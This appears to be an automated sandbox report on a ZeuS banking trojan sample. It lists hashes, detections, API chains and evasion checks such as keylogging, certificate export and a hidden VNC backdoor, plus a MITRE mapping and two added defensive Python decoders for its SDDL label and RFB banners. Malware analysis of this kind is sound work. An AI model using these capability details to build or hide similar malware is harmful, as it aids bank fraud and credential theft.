
Analysis Report ZeuS.exe

Overview

General Information

Sample Name:ZeuS.exe
Analysis ID:349874
MD5:e77a6d08421977ee157a02f2e7590b99
SHA1:0787ba39c8dd45cb189ce824abfd6fc9faa3d947
SHA256:b37d9a1f83fd7ff965d3187b451ad5669f56b9c39aa6e40cbd841ef0eac7b4d8

Detection

ZeusVM
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Classification chart (image omitted). Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious.
  • System is w10x64
  • ZeuS.exe (PID: 6624 cmdline: 'C:\Users\user\Desktop\ZeuS.exe' MD5: E77A6D08421977EE157A02F2E7590B99)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: ZeuS.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: ZeuS.exe | Virustotal: Detection: 95%
Source: ZeuS.exe | ReversingLabs: Detection: 97%
Machine Learning detection for sample
Source: ZeuS.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.ZeuS.exe.400000.0.unpack | Avira: Label: TR/Spy.A.5678
Source: 0.2.ZeuS.exe.400000.0.unpack | Avira: Label: TR/Spy.Zbot.619281
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040648B CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext 0_2_0040648B
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_004130AB CryptUnprotectData,LocalFree 0_2_004130AB

Compliance:

Uses 32bit PE files
Source: ZeuS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040C874 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW 0_2_0040C874
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040A860 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW 0_2_0040A860
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040A91B FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose 0_2_0040A91B
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00416C62 InternetReadFile 0_2_00416C62
Source: ZeuS.exe | String found in binary or memory: http://www.google.com/webhp
Source: ZeuS.exe | String found in binary or memory: http://www.google.com/webhpbcSeShutdownPrivilegesocksvncGlobal
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040E072 GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore 0_2_0040E072
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00404D51 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage 0_2_00404D51

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00419904 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle 0_2_00419904
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040B9A6 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation 0_2_0040B9A6
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00406B08 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary 0_2_00406B08
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0041907D InitiateSystemShutdownExW,ExitWindowsEx 0_2_0041907D
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0041D16A CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle 0_2_0041D16A
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0041B567
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_004016C3
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00407F39
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00406397
Source: ZeuS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engine | Classification label: mal76.bank.troj.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040D15A CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore 0_2_0040D15A
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040CFE5 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore 0_2_0040CFE5
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_004068B2 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle 0_2_004068B2
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040685B CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle 0_2_0040685B
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00412E07 CoCreateInstance 0_2_00412E07
Source: ZeuS.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ZeuS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ZeuS.exe | Virustotal: Detection: 95%
Source: ZeuS.exe | ReversingLabs: Detection: 97%
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040C874 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW 0_2_0040C874
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00402019 push cs; iretd 0_2_00402028
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040194D push es; iretd 0_2_0040195C
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00402F3A push ds; retf 0_2_00402FEA
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00402FDA push ds; retf 0_2_00402FEA
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00401FE3 push cs; ret 0_2_00401FF8
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00403FF9 pushfd ; retf 0_2_00404003
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040E31C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary 0_2_0040E31C

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\ZeuS.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_0-13161
Source: C:\Users\user\Desktop\ZeuS.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_0-13161
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\ZeuS.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-12540
Source: C:\Users\user\Desktop\ZeuS.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-12540
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\ZeuS.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-12739
Source: C:\Users\user\Desktop\ZeuS.exe | API coverage: 2.3 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040A860 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW 0_2_0040A860
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040A91B FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose 0_2_0040A91B
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0040C874 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW 0_2_0040C874
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0041C1F6 mov edx, dword ptr fs:[00000030h] 0_2_0041C1F6
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0041C53B GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId 0_2_0041C53B
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_004087D5 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree 0_2_004087D5
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00412174 InternetCrackUrlA,GetSystemTime,GetLocalTime,EnterCriticalSection,LeaveCriticalSection 0_2_00412174
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00417DDC GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW 0_2_00417DDC
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00405310 GetTimeZoneInformation 0_2_00405310
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_0041C007 GetVersionExW,GetNativeSystemInfo 0_2_0041C007
Source: ZeuS.exe | Binary or memory string: S:(ML;;NRNWNX;;;LW)
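The SDDL string above is what the code function at 0_2_004087D5 feeds to ConvertStringSecurityDescriptorToSecurityDescriptorW: a SACL holding a single mandatory-label (ML) ACE with the NR/NW/NX policy bits and the Low integrity SID. The following decoder is an added example for this report, not code from the sample or from Joe Sandbox. It parses the general ACE grammar (type;flags;rights;object_guid;inherit_guid;sid) for owner, group, DACL and SACL, and works out which integrity levels an ML ACE actually blocks; the constructed second string in the test exercises the DACL path as well. Only the SID aliases listed in the table are resolved, everything else is returned as written.

```python
"""Decode SDDL, in particular the mandatory-label string the sample passes to
ConvertStringSecurityDescriptorToSecurityDescriptorW ("S:(ML;;NRNWNX;;;LW)").

Added example for this report; not code from the sample or from Joe Sandbox.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Taken from the report: the label string found in the binary.
SAMPLE_SDDL = "S:(ML;;NRNWNX;;;LW)"

# Well-known SID aliases (subset): integrity labels plus a few common principals.
SID_ALIASES: Dict[str, str] = {
    "LW": "S-1-16-4096",   # Low mandatory level
    "ME": "S-1-16-8192",   # Medium mandatory level
    "HI": "S-1-16-12288",  # High mandatory level
    "SI": "S-1-16-16384",  # System mandatory level
    "SY": "S-1-5-18",      # LOCAL SYSTEM
    "BA": "S-1-5-32-544",  # BUILTIN\Administrators
    "WD": "S-1-1-0",       # Everyone
}
INTEGRITY_LEVELS = {0: "Untrusted", 4096: "Low", 8192: "Medium", 12288: "High", 16384: "System"}

# Two-letter rights tokens. NR/NW/NX are the mandatory-label policy bits.
RIGHTS: Dict[str, str] = {
    "NR": "NO_READ_UP", "NW": "NO_WRITE_UP", "NX": "NO_EXECUTE_UP",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}

ACE_RE = re.compile(r"\(([^)]*)\)")
# O:/G:/D:/S: components; each value runs until the next component tag.
COMPONENT_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")


@dataclass
class Ace:
    ace_type: str          # A, D, AU, ML, ...
    flags: str             # inheritance / audit flags, left raw
    rights: List[str]
    sid: str


@dataclass
class SecurityDescriptor:
    owner: Optional[str] = None
    group: Optional[str] = None
    dacl: List[Ace] = field(default_factory=list)
    sacl: List[Ace] = field(default_factory=list)


def _parse_rights(token: str) -> List[str]:
    """Split 'NRNWNX' into two-letter tokens; pass a hex access mask through untouched."""
    if not token:
        return []
    if token.startswith("0x"):
        return [token]
    if len(token) % 2:
        raise ValueError(f"bad rights token {token!r}")
    return [RIGHTS.get(token[i:i + 2], token[i:i + 2]) for i in range(0, len(token), 2)]


def _parse_acl(text: str) -> List[Ace]:
    aces = []
    for body in ACE_RE.findall(text):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"ACE needs six fields: {body!r}")
        ace_type, flags, rights, _object_guid, _inherit_guid, sid = parts
        aces.append(Ace(ace_type, flags, _parse_rights(rights), SID_ALIASES.get(sid, sid)))
    return aces


def parse_sddl(sddl: str) -> SecurityDescriptor:
    sd = SecurityDescriptor()
    for tag, value in COMPONENT_RE.findall(sddl):
        if tag == "O":
            sd.owner = SID_ALIASES.get(value, value)
        elif tag == "G":
            sd.group = SID_ALIASES.get(value, value)
        elif tag == "D":
            sd.dacl = _parse_acl(value)
        else:
            sd.sacl = _parse_acl(value)
    return sd


def levels_denied_by_label(ace: Ace) -> Dict[str, List[str]]:
    """For an ML ACE, map every integrity level below the label to the policy bits that
    block it. Callers at or above the label are not restricted by the label at all."""
    if ace.ace_type != "ML" or not ace.sid.startswith("S-1-16-"):
        raise ValueError("not a mandatory label ACE")
    label_rid = int(ace.sid.rsplit("-", 1)[1])
    policy = [r for r in ace.rights if r.startswith("NO_")]
    return {name: policy for rid, name in INTEGRITY_LEVELS.items() if rid < label_rid}


if __name__ == "__main__":
    sd = parse_sddl(SAMPLE_SDDL)
    print(sd.sacl[0])
    print(levels_denied_by_label(sd.sacl[0]))
```

For the sample's string the decoder yields one ML ACE labelled S-1-16-4096 (Low) with NO_READ_UP, NO_WRITE_UP and NO_EXECUTE_UP. Because the label is Low, only Untrusted-integrity callers are turned away by the label; a Low-integrity process such as a browser tab in Protected Mode passes the integrity check and the DACL alone decides access. That is the property to keep in mind when an object created with this descriptor (the Global\ named object the strings section hints at) turns up on a host.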

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: ZeuS.exe | String found in binary or memory: RFB 003.003
Source: ZeuS.exe, 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp | String found in binary or memory: -v.tmphttp://www.google.com/webhpbcSeShutdownPrivilegesocksvncGlobal\%08X%08X%08XRFB 003.003
Source: ZeuS.exe | String found in binary or memory: -v.tmphttp://www.google.com/webhpbcSeShutdownPrivilegesocksvncGlobal\%08X%08X%08XRFB 003.003
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00408606 socket,bind,closesocket 0_2_00408606
Source: C:\Users\user\Desktop\ZeuS.exe | Code function: 0_2_00408328 socket,bind,listen,closesocket 0_2_00408328
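"RFB 003.003" is the 12-byte ProtocolVersion banner an RFB (VNC) server sends first, and the socket/bind/listen chain above is how such a server gets onto a port. Since the sandbox saw no network activity, the port is unknown, so the practical hunt is to banner-grab every listening TCP port on a suspect host rather than to assume 5900. The decoder below is an added example for this report, not code from the sample, from Joe Sandbox or from RFC 6143; the banners and the security-type bytes it is tested against are constructed. Message layouts follow RFC 6143 (ProtocolVersion) and the RFB 3.3 behaviour it describes, where the server picks the security type and sends it as a single big-endian U32.

```python
"""RFB (VNC) handshake decoding for banner-based discovery of a hidden VNC server.

Added example for this report; not code from the sample or from Joe Sandbox.
"""
import re
import socket
from typing import Dict, Optional, Tuple

# Exactly 12 bytes: "RFB xxx.yyy\n"
RFB_VERSION_RE = re.compile(rb"\ARFB (\d{3})\.(\d{3})\n\Z")

# RFB 3.3 security types the server may announce.
V33_SECURITY = {0: "invalid (failure reason follows)", 1: "None", 2: "VNC Authentication"}

# Constructed test data (not captured from the sample): the banner string from the report,
# a server choosing VNC Authentication, and a port->banner map as a local sweep would gather.
SAMPLE_BANNER = b"RFB 003.003\n"
SAMPLE_V33_SECURITY = (2).to_bytes(4, "big")
CONSTRUCTED_BANNERS: Dict[int, bytes] = {
    80: b"HTTP/1.1 400 Bad Request\r\n",
    22: b"SSH-2.0-OpenSSH_8.4\r\n",
    5900: b"RFB 003.008\n",
    49152: b"RFB 003.003\n",   # non-standard port: the case a backdoor listener presents
}


def parse_rfb_version(data: bytes) -> Optional[Tuple[int, int]]:
    """Return (major, minor) if the first 12 bytes are an RFB ProtocolVersion message."""
    m = RFB_VERSION_RE.match(data[:12])
    return (int(m.group(1)), int(m.group(2))) if m else None


def client_version_reply(version: Tuple[int, int]) -> bytes:
    """Echo the server's version; a client may answer with any version not above it."""
    return b"RFB %03d.%03d\n" % version


def parse_v33_security(data: bytes) -> Tuple[int, str]:
    """Decode the RFB 3.3 security-type U32 the server sends after the version exchange."""
    if len(data) < 4:
        raise ValueError("need 4 bytes")
    st = int.from_bytes(data[:4], "big")
    return st, V33_SECURITY.get(st, f"unknown ({st})")


def parse_v33_failure_reason(data: bytes) -> str:
    """Security type 0 is followed by a U32 length and an ASCII reason string."""
    n = int.from_bytes(data[:4], "big")
    return data[4:4 + n].decode("ascii", "replace")


def classify_banners(banners: Dict[int, bytes]) -> Dict[int, Tuple[int, int]]:
    """Given port -> first bytes read from it, keep only the ports that speak RFB."""
    found = {}
    for port, banner in banners.items():
        version = parse_rfb_version(banner)
        if version:
            found[port] = version
    return found


def probe_rfb(host: str, port: int, timeout: float = 2.0) -> Optional[dict]:
    """Live probe (network I/O, not exercised offline): connect, read the banner, echo it,
    and for 3.3 read the server-chosen security type. Returns None if the port is not RFB."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        version = parse_rfb_version(s.recv(12))
        if version is None:
            return None
        s.sendall(client_version_reply(version))
        info = {"version": version}
        if version == (3, 3):
            st, name = parse_v33_security(s.recv(4))
            info["security"] = name
            if st == 0:
                info["reason"] = parse_v33_failure_reason(s.recv(4096))
        return info


if __name__ == "__main__":
    print(classify_banners(CONSTRUCTED_BANNERS))
```

Feed classify_banners() the first bytes read from each listening port (netstat or a short socket sweep supplies the port list) and any RFB speaker stands out regardless of port. A server on 3.3 that answers with security type 1 (None) is reachable without a password, which is worth recording before anything else when such a listener is found on a compromised host.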

Mitre Att&ck Matrix

Techniques matched, with the number of triggering signatures in parentheses; all other cells of the matrix were empty:

Initial Access: Valid Accounts (1)
Execution: Native API (13)
Persistence: Create Account (1), Valid Accounts (1), Application Shimming (1)
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (11), Application Shimming (1)
Defense Evasion: Valid Accounts (1), Access Token Manipulation (11), Obfuscated Files or Information (1), Install Root Certificate (1), Software Packing (1)
Credential Access: Input Capture (11)
Discovery: Network Share Discovery (1), System Time Discovery (2), Security Software Discovery (1), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (3)
Lateral Movement: Remote Desktop Protocol (1)
Collection: Input Capture (11), Archive Collected Data (1), Clipboard Data (1)
Exfiltration: none
Command and Control: Encrypted Channel (2), Remote Access Software (1), Ingress Tool Transfer (1)
Network Effects: none
Remote Service Effects: none
Impact: System Shutdown/Reboot (1)
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
ZeuS.exe | 96% | Virustotal |
ZeuS.exe | 98% | ReversingLabs | Win32.Trojan.Zeus
ZeuS.exe | 100% | Avira | TR/Spy.A.5678
ZeuS.exe | 100% | Joe Sandbox ML |

Dropped Files
No Antivirus matches

Unpacked PE Files
Source | Detection | Scanner | Label
0.0.ZeuS.exe.400000.0.unpack | 100% | Avira | TR/Spy.A.5678
0.2.ZeuS.exe.400000.0.unpack | 100% | Avira | TR/Spy.Zbot.619281

Domains
No Antivirus matches

URLs
No Antivirus matches

Domains and IPs
No contacted domains info
No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:349874
Start date:08.02.2021
Start time:12:06:15
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 29s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ZeuS.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.bank.troj.evad.winEXE@1/0@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 91.5%)
  • Quality average: 81.5%
  • Quality standard deviation: 30.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): svchost.exe
No simulations
No context (Joe Sandbox View: IPs, domains, ASNs, JA3 fingerprints, dropped files)
No created / dropped files found

Static File Info

General

File type:MS-DOS executable
Entropy (8bit):6.700204512671534
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • DOS Executable Borland Pascal 7.0x (2037/25) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • VXD Driver (31/22) 0.00%
File name:ZeuS.exe
File size:141312
MD5:e77a6d08421977ee157a02f2e7590b99
SHA1:0787ba39c8dd45cb189ce824abfd6fc9faa3d947
SHA256:b37d9a1f83fd7ff965d3187b451ad5669f56b9c39aa6e40cbd841ef0eac7b4d8
SHA512:775dd98123b62a9a908bf7a40c9e0c5a39e2e7685ce462109e82feb31f8ea24e162a9ee553a93e119e34701aabf90bbe47bbf0f154fa8477a010af4851b48c90
SSDEEP:3072:/caqyte6tV77snHLLxtUyaXOqdPNbnhW4IxZx5kCZuubFrhU1wKKrONmo:/caBt777snHRXY7PNNW4IxZ7zbC0rONx
File Content Preview:MZ......................................................................................................................................................................................................................PE..L......M.....................:.....

File Icon

Icon Hash:00828e8e8686b000

General

Entrypoint:0x41d470
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x4DA70DA0 [Thu Apr 14 15:07:12 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:1c2489367a741a394ef5f46c06397c1b
Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ecx, ecx
xor bl, bl
call 00007FDE64725E30h
test al, al
je 00007FDE64726E4Ah
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [004011A0h]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [0040119Ch]
push eax
call dword ptr [004012CCh]
test eax, eax
je 00007FDE64726DF7h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007FDE64726DB1h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007FDE64726DA4h
cmp word ptr [ecx], 002Dh
jne 00007FDE64726D9Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007FDE64726D91h
cmp ecx, 69h
je 00007FDE64726D88h
cmp ecx, 6Eh
je 00007FDE64726D7Dh
cmp ecx, 76h
jne 00007FDE64726D86h
mov byte ptr [ebp-01h], 00000001h
jmp 00007FDE64726D80h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007FDE64726D7Ah
mov bl, 01h
jmp 00007FDE64726D76h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007FDE64726D33h
push eax
call dword ptr [00401114h]
test bl, bl
je 00007FDE64726D79h
call 00007FDE647267E4h
jmp 00007FDE64726DA6h
cmp byte ptr [ebp-01h], 00000000h
je 00007FDE64726D95h
call 00007FDE64716FA8h
call 00007FDE64721219h
test byte ptr [004239B0h], 00000004h
mov bl, al
je 00007FDE64726D8Dh
push 00000000h
mov eax, 00423238h
call 00007FDE64716E05h
jmp 00007FDE64726D7Fh
Data Directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f6a4 | 0x118 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25000 | 0x11a4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x5a0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x20584 | 0x20600 | False | 0.642932553089 | data | 6.72226048935 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x2054 | 0x400 | False | 0.2138671875 | data | 1.63599053271 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x25000 | 0x166a | 0x1800 | False | 0.625813802083 | data | 5.63870259283 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Imports
